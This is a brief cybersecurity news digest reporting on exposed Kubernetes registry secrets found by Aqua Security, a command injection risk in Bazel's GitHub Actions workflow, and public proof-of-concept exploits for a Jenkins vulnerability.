Numerous organizations and open-source projects could be impacted by a supply chain attack stemming from publicly exposed Kubernetes secrets enabling access to sensitive Software Development Life Cycle environments, according to SecurityWeek.
Nearly 46% of all Kubernetes .dockerconfigjson and .dockercfg secrets with base64-encoded user and password values had credentials to registries, most of which had pushing and pulling privileges, as well as contained private container images, a report from Aqua Security revealed. Researchers were also able to discover credentials for SAP's Artifacts repository, which contained over 95 million artifacts, including those from various Fortune 500 firms and two leading blockchain companies.
"The exposure of this Artifacts repository key represented a considerable security risk. The potential threats stemming from such access included the leakage of proprietary code, data breaches, and the risk of supply chain attacks, all of which could compromise the integrity of the organization and the security of its customers," said Aqua Security.
A GitHub Actions workflow could have been used for a command injection vulnerability in Bazel, which had the potential for threat actors to add malicious code into the production environment for projects using the Google open-source product.
Numerous cybersecurity researchers have already released their proof-of-concept exploits for a critical vulnerability impacting open-source automation server Jenkins on GitHub, reports BleepingComputer.